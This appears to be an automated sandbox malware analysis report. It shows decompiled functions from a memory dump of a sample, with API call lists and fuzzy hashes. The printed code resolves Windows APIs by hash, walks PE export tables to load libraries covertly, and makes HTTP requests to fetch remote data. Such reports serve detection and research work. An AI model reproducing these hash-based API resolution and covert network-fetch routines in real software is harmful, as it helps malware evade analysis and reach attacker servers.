0x00364e40
0x00364e48
0x00364e48
0x00364e52
0x00364e5b
0x00364e60
0x00364e6d
0x00364e72
0x00364e72
0x00364e75
0x00364e7a
0x00364e84
0x00364e86
0x00364e8f
0x00364eb9
0x00364eb9
0x00364ebe
0x00364ec3
0x00364ec3
0x00364dba
0x00364ecc
0x00364ed4
0x00364edc
0x00364ee4
0x00364eef
0x00364efa
0x00364f05
0x00364f10
0x00364f1b
0x00364f26
0x00364f31
0x00364f3c
0x00364f47
0x00364f4f
0x00000000
0x00000000
0x00000000
0x003646f2
0x00364f60

APIs

Part of subcall function 00365180: CreateDirectoryW.KERNEL32(?,00000000), ref: 003651F0

Part of subcall function 003521E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00352210

Part of subcall function 0035A5E0: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0035A620

CreateThread.KERNEL32(00000000,00000000,Function_00015420,00000000,00000000,00000000), ref: 00364EB9

Part of subcall function 00369C40: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 00369C6F
Part of subcall function 00369C40: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00369C89

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: Create$ChangeCloseDirectoryFileFindFreeNotificationThreadVirtual
String ID:
API String ID: 1065963300-0
Opcode ID: 62ddced0b864b29e0defd5cca1c1a771285f74d0e4b68cf30b03f91bc5f61b2a
Instruction ID: c16ebcaa6aa430bb9415bc5719981d2ada0f496cdafdc43775568162787fe9c2
Opcode Fuzzy Hash: 62ddced0b864b29e0defd5cca1c1a771285f74d0e4b68cf30b03f91bc5f61b2a
Instruction Fuzzy Hash: F932D5B5E002196BDF12BB60EC53FBE7269AF50304F444574FC19AF2D7EE316A0986A1

Uniqueness

Uniqueness Score: -1.00%

Function 0035BF50, Relevance: 1.7, APIs: 1, Instructions: 182
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0035BF50(void* __eflags, signed int _a4, signed int _a8) {
				signed int* _v20;
				char _v52;
				char _v159;
				signed int _t32;
				intOrPtr _t35;
				struct HINSTANCE__* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed int _t51;
				signed int* _t52;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				void* _t62;

				_t60 = _a8;
				_t32 = E00359D50(0x647402c4);
				_t62 = _t61 + 4;
				_t57 = _t60 % _t32;
				_t35 =  *((intOrPtr*)(0x372cb8 + _t57 * 4));
				_t58 = _t57;
				if(_t35 == 0) {
					L4:
					_t51 = _a4;
					_v20 = 0x372cb8 + _t58 * 4;
					if(_t51 > 0x23) {
						L39:
						_t37 =  *(0x372134 + _t51 * 4);
						if( *(0x372134 + _t51 * 4) != 0) {
							L49:
							_t38 = E0035D830(_t37, _t60);
							_t52 = _v20;
							__eflags = _t38;
							if(__eflags != 0) {
								L52:
								 *_t52 = _t60;
								 *(0x374198 + _t58 * 4) = _t38;
								return _t38;
							}
							_t39 = E0035BF50(__eflags, 0, 0xba94474);
							 *_t39(0);
							L51:
							_t38 = 0;
							goto L52;
						}
						if(_t51 == 0x17) {
							_t37 =  *0x3737cc; // 0x0
							__eflags = _t37;
							if(__eflags != 0) {
								L48:
								 *(0x372134 + _t51 * 4) = _t37;
								goto L49;
							}
							L46:
							_t41 = E0035BF50(_t77, 0, 0xba94474);
							 *_t41(0);
							 *(0x372134 + _t51 * 4) = 0;
							_t52 = _v20;
							goto L51;
						}
						if(_t51 == 0x16) {
							_t37 =  *0x374b38; // 0x0
							__eflags = _t37;
							if(__eflags == 0) {
								goto L46;
							}
							goto L48;
						}
						if(_t51 != 0x15) {
							_t37 = LoadLibraryA( &_v52); // executed
							__eflags = _t37;
							if(__eflags != 0) {
								goto L48;
							}
							goto L46;
						}
						_t37 =  *0x3737d0; // 0x0
						_t77 = _t37;
						if(_t37 != 0) {
							goto L48;
						}
						goto L46;
					}
					switch( *((intOrPtr*)(_t51 * 4 +  &M003700B0))) {
						case 0:
							L38:
							E0035C560( &_v52, E0035D0A0(0x370550, 0x370550,  &_v159), 0xffffffff);
							_t62 = _t62 + 0x14;
							goto L39;
						case 1:
							goto L38;
						case 2:
							__eax = 0x370bfc;
							goto L38;
						case 3:
							__eax = 0x370894;
							goto L38;
						case 4:
							__eax = 0x371044;
							goto L38;
						case 5:
							__eax = 0x3705e2;
							goto L38;
						case 6:
							__eax = 0x3707e9;
							goto L38;
						case 7:
							__eax = 0x37043c;
							goto L38;
						case 8:
							__eax = 0x370538;
							goto L38;
						case 9:
							__eax = 0x370781;
							goto L38;
						case 0xa:
							__eax = 0x3709fc;
							goto L38;
						case 0xb:
							__eax = 0x37097c;
							goto L38;
						case 0xc:
							__eax = 0x37101b;
							goto L38;
						case 0xd:
							__eax = 0x3707a6;
							goto L38;
						case 0xe:
							__eax = 0x37068d;
							goto L38;
						case 0xf:
							__eax = 0x370b87;
							goto L38;
						case 0x10:
							__eax = 0x370c24;
							goto L38;
						case 0x11:
							__eax = 0x370b75;
							goto L38;
						case 0x12:
							__eax = 0x3709bc;
							goto L38;
						case 0x13:
							__eax = 0x3704b8;
							goto L38;
						case 0x14:
							__eax = 0x37052c;
							goto L38;
						case 0x15:
							goto L39;
						case 0x16:
							__eax = 0x370814;
							goto L38;
						case 0x17:
							__eax = 0x370900;
							goto L38;
						case 0x18:
							__eax = 0x370480;
							goto L38;
						case 0x19:
							__eax = 0x37076e;
							goto L38;
						case 0x1a:
							__eax = 0x370699;
							goto L38;
						case 0x1b:
							__eax = 0x3704db;
							goto L38;
						case 0x1c:
							__eax = 0x370c31;
							goto L38;
						case 0x1d:
							__eax = 0x370b60;
							goto L38;
						case 0x1e:
							__eax = 0x3709c4;
							goto L38;
						case 0x1f:
							__eax = 0x370a2c;
							goto L38;
						case 0x20:
							__eax = 0x3709a6;
							goto L38;
					}
				}
				0;
				0;
				while(1) {
					_t69 = _t35 - _t60;
					if(_t35 == _t60) {
						break;
					}
					E00351460(_t69, _t58, 1);
					_t62 = _t62 + 8;
					_t58 =  >  ? 0 : _t58 + 1;
					_t35 =  *((intOrPtr*)(0x372cb8 + _t58 * 4));
					if(_t35 != 0) {
						continue;
					}
					goto L4;
				}
				return  *(0x374198 + _t58 * 4);
			}

0x0035bf5c
0x0035bf64
0x0035bf69
0x0035bf74
0x0035bf76
0x0035bf7d
0x0035bf81
0x0035bfb6
0x0035bfb6
0x0035bfc0
0x0035bfc6
0x0035c0fe
0x0035c0fe
0x0035c107
0x0035c163
0x0035c165
0x0035c16d
0x0035c170
0x0035c172
0x0035c189
0x0035c189
0x0035c18b
0x00000000
0x0035c18b
0x0035c17b
0x0035c185
0x0035c187
0x0035c187
0x00000000
0x0035c187
0x0035c10c
0x0035c127
0x0035c12c
0x0035c12e
0x0035c15c
0x0035c15c
0x00000000
0x0035c15c
0x0035c130
0x0035c137
0x0035c141
0x0035c143
0x0035c14e
0x00000000
0x0035c14e
0x0035c111
0x0035c153
0x0035c158
0x0035c15a
0x00000000
0x00000000
0x00000000
0x0035c15a
0x0035c116
0x0035c1a1
0x0035c1a7
0x0035c1a9
0x00000000
0x00000000
0x00000000
0x0035c1ab
0x0035c11c
0x0035c121
0x0035c123
0x00000000
0x00000000
0x00000000
0x0035c125
0x0035bfd1
0x00000000
0x0035c0df
0x0035c0f6
0x0035c0fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0035bfee
0x00000000
0x00000000
0x0035bff8
0x00000000
0x00000000
0x0035c002
0x00000000
0x00000000
0x0035c00c
0x00000000
0x00000000
0x0035c016
0x00000000
0x00000000
0x0035c020
0x00000000
0x00000000
0x0035c02a
0x00000000
0x00000000
0x0035c034
0x00000000
0x00000000
0x0035c03e
0x00000000
0x00000000
0x0035c048
0x00000000
0x00000000
0x0035c052
0x00000000
0x00000000
0x0035c05c
0x00000000
0x00000000
0x0035c063
0x00000000
0x00000000
0x0035c06a
0x00000000
0x00000000
0x0035c071
0x00000000
0x00000000
0x0035c078
0x00000000
0x00000000
0x0035c07f
0x00000000
0x00000000
0x0035c086
0x00000000
0x00000000
0x0035c08d
0x00000000
0x00000000
0x00000000
0x00000000
0x0035c094
0x00000000
0x00000000
0x0035c09b
0x00000000
0x00000000
0x0035c0a2
0x00000000
0x00000000
0x0035c0a9
0x00000000
0x00000000
0x0035c0b0
0x00000000
0x00000000
0x0035c0da
0x00000000
0x00000000
0x0035c0b7
0x00000000
0x00000000
0x0035c0be
0x00000000
0x00000000
0x0035c0c5
0x00000000
0x00000000
0x0035c0cc
0x00000000
0x00000000
0x0035c0d3
0x00000000
0x00000000
0x0035bfd1
0x0035bf89
0x0035bf8d
0x0035bf90
0x0035bf90
0x0035bf92
0x00000000
0x00000000
0x0035bf97
0x0035bf9c
0x0035bfa8
0x0035bfab
0x0035bfb4
0x00000000
0x00000000
0x00000000
0x0035bfb4
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 0035C1A1

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 35f825f5f24ab0ae752976dc0981388c2e1482b766cb05a264f4c0e4ed52c1da
Instruction ID: 2cb17f88cfcc641e3309ba44e3def35370368eb4219ba78a5b00ef71bf5c5876
Opcode Fuzzy Hash: 35f825f5f24ab0ae752976dc0981388c2e1482b766cb05a264f4c0e4ed52c1da
Instruction Fuzzy Hash: A351E76C768309DFC7376A689C90E25A25E970130EF12E021BD0DCB7B3D22ADD8C5B52

Uniqueness

Uniqueness Score: -1.00%

Function 0035D270, Relevance: 1.6, APIs: 1, Instructions: 98
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0035D270(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				signed short _v32;
				intOrPtr _v40;
				char _v44;
				void* _t22;
				void* _t23;
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t37;
				void* _t43;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;

				_t22 = E0036FCF0(__ecx);
				_t54 =  &_v44;
				_t23 = E00360190(__eflags, _t22,  &_v44);
				_t57 = _t56 + 8;
				_t64 = _t23;
				if(_t23 == 0) {
					_t43 = 0;
				} else {
					_t26 = E0036B790(_t64,  *0x372838, _v44, _v32 & 0x0000ffff, _a8); // executed
					_t58 = _t57 + 0x10;
					if(_t26 == 0) {
						_t43 = 0;
					} else {
						_v20 = 1 + (0 | _v30 == 0x00000002) * 4;
						_t31 = E0036F190(__edx);
						_t32 = E0036EE10(__edx);
						_v20 = _t26;
						_t33 = E0036BAD0(_v30 - 2, _t26, _v40, 0, _t32, _t31, _v20); // executed
						_t61 = _t58 - 4 + 0x1c;
						if(_t33 == 0) {
							_t43 = 0;
							_t54 =  &_v44;
						} else {
							_t53 = _t33;
							_t37 = E00351AF0(_t53,  &_v28, 0,  *0x372c80); // executed
							_t62 = _t61 + 0x10;
							_t68 = _t37;
							_t54 =  &_v44;
							if(_t37 == 0) {
								_t43 = 0;
								__eflags = 0;
							} else {
								E0036F410(_v28, _a4, _v28, _v24 + _v28);
								E0035B570(_v28);
								_t62 = _t62 + 4;
								_t43 = 1;
							}
							E0035BF50(_t68, 0x13, 0x714b685);
							_t61 = _t62 + 8;
							InternetCloseHandle(_t53); // executed
						}
						E0036BA40(_t68, _v20);
						_t58 = _t61 + 4;
					}
					E0036B690(_t54);
				}
				return _t43;
			}

0x0035d27b
0x0035d280
0x0035d285
0x0035d28a
0x0035d28d
0x0035d28f
0x0035d337
0x0035d295
0x0035d2a6
0x0035d2ab
0x0035d2b0
0x0035d33b
0x0035d2b6
0x0035d2ca
0x0035d2cd
0x0035d2d6
0x0035d2e8
0x0035d2ec
0x0035d2f1
0x0035d2f6
0x0035d33f
0x0035d341
0x0035d2f8
0x0035d2f8
0x0035d307
0x0035d30c
0x0035d30f
0x0035d311
0x0035d314
0x0035d346
0x0035d346
0x0035d316
0x0035d323
0x0035d32b
0x0035d330
0x0035d333
0x0035d333
0x0035d34f
0x0035d354
0x0035d358
0x0035d358
0x0035d35e
0x0035d363
0x0035d363
0x0035d367
0x0035d36c
0x0035d378

APIs

Part of subcall function 0036B790: InternetOpenA.WININET(00370580,?,00000000,00000000,00000000,?,0035CD77,?,?,?,00000001,00000000,?,0035CD77,?,00000001), ref: 0036B7C2
Part of subcall function 0036B790: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 0036B862

Part of subcall function 0036BAD0: HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0036BBA3

Part of subcall function 00351AF0: InternetReadFile.WININET(?,?,00040000,00040000), ref: 00351B86

InternetCloseHandle.WININET(00000000), ref: 0035D358

Part of subcall function 0035B570: RtlFreeHeap.NTDLL(00000000,003686DD,003686DD,00000000), ref: 0035B593

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: Internet$Open$CloseConnectFileFreeHandleHeapHttpReadRequest
String ID:
API String ID: 3651809878-0
Opcode ID: 3d7e7c65cc0036fb66a3ffa0e9133e873695e284dd4597eba5e2f0308fa428a2
Instruction ID: e9f11b94b75c0fec650b9627fe9678f8aec0d722430e983c2dd1fbaf407319a0
Opcode Fuzzy Hash: 3d7e7c65cc0036fb66a3ffa0e9133e873695e284dd4597eba5e2f0308fa428a2
Instruction Fuzzy Hash: A421F7B6D001086BDF12ABE09C42EFF7B79DF44355F084034FE04AB116E7319919C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00351490, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00351490(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
				signed int _v20;
				char _v540;
				void* _t16;
				long _t23;
				intOrPtr* _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;
				void* _t31;
				void* _t33;

				_t27 = _a20 & 0x000000ff;
				_t28 = 0;
				_v20 = _a24 & 0x000000ff;
				do {
					_t14 =  &_v540;
					E00355CD0(_t35, _a4,  &_v540, _t27, _v20);
					_t16 = E00368960(_a12, _a8, _t14);
					_t33 = _t31 + 0x1c;
					if(_t16 == 0) {
						goto L2;
					}
					_t37 = _a16;
					if(_a16 == 0) {
						L1:
						E0035BF50(__eflags, 0, 0xbf8ba27);
						_t33 = _t33 + 8;
						_t23 = GetFileAttributesW(_a12); // executed
						__eflags = _t23 - 0xffffffff;
						if(__eflags == 0) {
							return 1;
						}
						goto L2;
					}
					_t25 = E0035BF50(_t37, 3, 0xd85c117);
					_t33 = _t33 + 8;
					_t26 =  *_t25(_a12, _a16);
					_t38 = _t26;
					if(_t26 != 0) {
						goto L1;
					}
					L2:
					_t30 = E003522E0(_t38, 0,  !_t28);
					E00351460(_t38, _t28, 1);
					_t31 = _t33 + 0x10;
					_t35 = _t30 - 0x64;
					_t28 = _t30;
				} while (_t30 != 0x64);
				return 0;
			}

0x003514a0
0x003514a4
0x003514a6
0x003514ec
0x003514f0
0x003514fc
0x0035150b
0x00351510
0x00351515
0x00000000
0x00000000
0x00351517
0x0035151b
0x003514b0
0x003514b7
0x003514bc
0x003514c2
0x003514c4
0x003514c7
0x00000000
0x00351542
0x00000000
0x003514c7
0x00351524
0x00351529
0x00351532
0x00351534
0x00351536
0x00000000
0x00000000
0x003514c9
0x003514d8
0x003514dd
0x003514e2
0x003514e5
0x003514e8
0x003514e8
0x00000000

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction ID: 46f822aefd161efbe950d87e37803213f796c95503ef58c5b9597bc65c96e212
Opcode Fuzzy Hash: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction Fuzzy Hash: 5D113DB18002197BDF132E61AC02FBF3A699F50357F050520FC29A51F2F532CE3895A1

Uniqueness

Uniqueness Score: -1.00%

Function 00358290, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00358290(intOrPtr _a4) {
				void* _t4;
				long _t6;
				void* _t8;
				intOrPtr _t9;

				_t9 = _a4;
				_t19 = _t9;
				if(_t9 == 0) {
					__eflags = 0;
					return 0;
				}
				_t4 = E00351460(_t19, _t9, E00359D50(0x1bde8cd4));
				_t6 = E003522E0(_t19, _t4 + 4, E00359D50(0x1bde8cd4));
				E0035BF50(_t19, 0, 0x8685de3);
				_t8 = RtlAllocateHeap( *0x372124, 8, _t6); // executed
				return _t8;
			}

0x00358294
0x00358297
0x00358299
0x003582ec
0x00000000
0x003582ec
0x003582aa
0x003582c6
0x003582d7
0x003582e8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 003582E8

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 248a0ed0618a8df358da5ec974faf09c37deda25c988a5beb94ee52eb06d705e
Instruction ID: 78e9a34a9174e34b8899e83ac779fcf8ce15752d356d5c688276673485b71aac
Opcode Fuzzy Hash: 248a0ed0618a8df358da5ec974faf09c37deda25c988a5beb94ee52eb06d705e
Instruction Fuzzy Hash: 18E03766D5152477D5533261BC03EBB259C4B1576BF0A0030FD0D7A262E9426A1C02F7

Uniqueness

Uniqueness Score: -1.00%

Function 0036C210, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0036C210(void* __eflags) {
				char _v408;
				intOrPtr* _t2;
				signed short _t3;
				void* _t5;

				_t2 = E0035BF50(__eflags, 6, 0xaaf7240); // executed
				_t3 = E00359BA0(_t2, 0x2ae);
				_t5 =  *_t2(_t3 & 0x0000ffff,  &_v408); // executed
				return E003555C0(_t5, 0) & 0x00000001;
			}

0x0036c221
0x0036c230
0x0036c243
0x0036c25a

APIs

WSAStartup.WS2_32(?,?), ref: 0036C243

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction ID: 7deaca47429233d430084fbce1bef5d3d3358e5815aea8f7b0eb04cc0f90ddc1
Opcode Fuzzy Hash: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction Fuzzy Hash: 5FE086B2D4031437F52171B17C17FB63A084711716F450461FE4C591D2F456762C84F6

Uniqueness

Uniqueness Score: -1.00%

Function 00360390, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00360390(void* __eax) {
				void _v12;
				void* _t4;
				int _t7;
				void* _t15;

				_v12 = 0xa;
				_t4 = E00359D50(0x647400bf);
				E0035BF50(_t15, _t4, E00359D50(0x61c0d6ad)); // executed
				_t7 = InternetSetOptionA(0, 0x49,  &_v12, 4); // executed
				return _t7;
			}

0x00360395
0x003603a1
0x003603ba
0x003603cc
0x003603d3

APIs

InternetSetOptionA.WININET(00000000,00000049,?,00000004,?,?,?,0035C94D), ref: 003603CC

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: InternetOption
String ID:
API String ID: 3327645240-0
Opcode ID: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction ID: c19512e006efc848a6abb752e7272edc997f925d237db5f298daa7c8e58249dc
Opcode Fuzzy Hash: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction Fuzzy Hash: A7E086E5D4021476E61162D0EC03FBB755C8B1122AF040070FE0D99292F655661886E3

Uniqueness

Uniqueness Score: -1.00%

Function 0035B570, Relevance: 1.5, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0035B570(void* _a4) {
				void* _t2;
				char _t4;
				void* _t5;

				_t5 = _a4;
				_t8 = _t5;
				if(_t5 != 0) {
					E0035BF50(_t8, 0, 0xb86de55);
					_t4 = RtlFreeHeap( *0x372124, 0, _t5); // executed
					return _t4;
				}
				return _t2;
			}

0x0035b574
0x0035b577
0x0035b579
0x0035b582
0x0035b593
0x00000000
0x0035b593
0x0035b597

APIs

RtlFreeHeap.NTDLL(00000000,003686DD,003686DD,00000000), ref: 0035B593

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7b2f7feda3c84c52f5a76b94347ab7e505c2b97de25842e84a82deeacee7e9e8
Instruction ID: ade5451f4ebf3fdbcb1af6388914d741240a11032e4cf3a4a43c8a2c85a9859a
Opcode Fuzzy Hash: 7b2f7feda3c84c52f5a76b94347ab7e505c2b97de25842e84a82deeacee7e9e8
Instruction Fuzzy Hash: 2BD0137274532437D5131695BC07F57775C9B15F92F050021FE0C7B1616551791445E1

Uniqueness

Uniqueness Score: -1.00%

Function 00368F40, Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00368F40(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
				char _t8;
				signed int _t11;
				signed int _t13;
				char _t14;
				void* _t15;

				if(_a8 == 0) {
					L7:
					return _t8;
				}
				_t13 = _a16 & 0x000000ff;
				_t11 = _a12 & 0x000000ff;
				_t14 = 0;
				_t18 = 0;
				if(0 != 0) {
					L5:
					_t18 = _a20;
					if(_a20 != 0) {
						E0035BF50(_t18, 0, 0x7a2bc0);
						_t15 = _t15 + 8;
						Sleep(0x14); // executed
					}
					while(1) {
						L3:
						 *((char*)(_a4 + _t14)) = E0035D620(_t11, _t13);
						_t8 = E00351460(_t18, _t14, 1);
						_t15 = _t15 + 0x10;
						_t14 = _t8;
						if(_t8 == _a8) {
							goto L7;
						}
						if(_t14 == 0) {
							continue;
						}
						goto L5;
					}
					goto L7;
				}
				goto L3;
			}

0x00368f4a
0x00368fa5
0x00368fa5
0x00368fa5
0x00368f4c
0x00368f50
0x00368f54
0x00368f56
0x00368f58
0x00368f86
0x00368f86
0x00368f8a
0x00368f93
0x00368f98
0x00368f9d
0x00368f9d
0x00368f60
0x00368f60
0x00368f6d
0x00368f73
0x00368f78
0x00368f7e
0x00368f80
0x00000000
0x00000000
0x00368f84
0x00000000
0x00000000
0x00000000
0x00368f84
0x00000000
0x00368f60
0x00000000

APIs

Sleep.KERNEL32(00000014), ref: 00368F9D

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction ID: b0e42fdc0f7090102d7a94db1e54d27023a64d7e3d510918e5a1e03096f93fbc
Opcode Fuzzy Hash: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction Fuzzy Hash: B4F08B6190536C7ACB330F20BC01FEE3B594B89B6AF0A4311FC052D286C9A089A482F1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0035D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0035D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E003612D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E00359D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E00359D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E00351460(_t205, E00351460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E00351460(0,  ~( *_t143), _v40));
							E00351460(0,  *_t143, _a4);
							E00368F20( &_v140, E00359D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E0036D680(0, _t91);
									_t176 = _t176 - E003522E0(0, 0, 1);
									E00351460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E003600A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E00351460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E00359D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E003522E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E00351460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E00357DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E00351460(__eflags, E003522E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E00351460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E00351460(__eflags, _t137, E00359D50(0x3638cbc4));
										E00351460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E00357DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E00359D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E00357DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E00357DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E003555A0(_v28, 0xa);
													_t199 = _t199 + 8;
